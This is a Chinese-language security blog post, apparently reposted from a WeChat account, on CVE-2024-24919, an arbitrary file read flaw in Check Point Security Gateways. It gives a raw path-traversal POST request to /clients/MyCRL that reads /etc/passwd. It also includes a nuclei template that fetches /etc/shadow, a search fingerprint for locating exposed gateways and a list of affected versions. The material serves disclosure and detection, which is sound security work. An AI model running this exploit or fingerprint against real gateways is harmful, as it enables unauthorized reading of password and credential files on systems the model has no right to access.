Check Point Security Gateways 任意文件读取漏洞 CVE-2024-24919

admin 2024年6月3日17:15:45评论20 views字数 1529阅读5分5秒阅读模式

系统介绍

Check Point Security Gateways是以色列Check Point公司的一个人工智能驱动的 NGFW 安全网关

漏洞复现

1、替换需要读取的文件,发送请求

POST /clients/MyCRL HTTP/1.1
Host: 1.1.1.1
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/passwd

nuclei script

id: CVE-2024-24919

info:
  name: Check Point Quantum Gateway - Information Disclosure
  author: johnk3r
  severity: high
  description: |
    CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.
  reference:
    - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
    - https://support.checkpoint.com/results/sk/sk182337
  metadata:
    max-request: 1
    vendor: checkpoint
    product: quantum_security_gateway
    cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*
    shodan-query: html:"Check Point SSL Network"
    verified: true
  tags: cve,cve2024,checkpoint,lfi

http:
  - raw:
      - |
        POST /clients/MyCRL HTTP/1.1
        Host: {{Hostname}}

        aCSHELL/../../../../../../../etc/shadow

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:"
          - "nobody:"
        condition: and

      - type: status
        status:
          - 200

搜索指纹

title="Check Point SSL Network Extender"

利用条件

Check Point 安全网关 R77.20(EOL)

Check Point 安全网关 R77.30(EOL)

Check Point 安全网关 R80.10(EOL)

Check Point 安全网关 R80.20(EOL)

Check Point 安全网关 R80.20.x

Check Point 安全网关 R80.20SP (EOL)

Check Point 安全网关 R80.30(EOL)

Check Point 安全网关 R80.30SP (EOL)

Check Point 安全网关 R80.40(EOL)

Check Point 安全网关 R81

Check Point 安全网关 R81.10

Check Point 安全网关 R81.10.x

Check Point 安全网关 R81.20

原文始发于微信公众号(Eonian Sharp):漏洞预警 | Check Point Security Gateways 任意文件读取漏洞 CVE-2024-24919

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月3日17:15:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Check Point Security Gateways 任意文件读取漏洞 CVE-2024-24919http://cn-sec.com/archives/2809748.html

发表评论

匿名网友 填写信息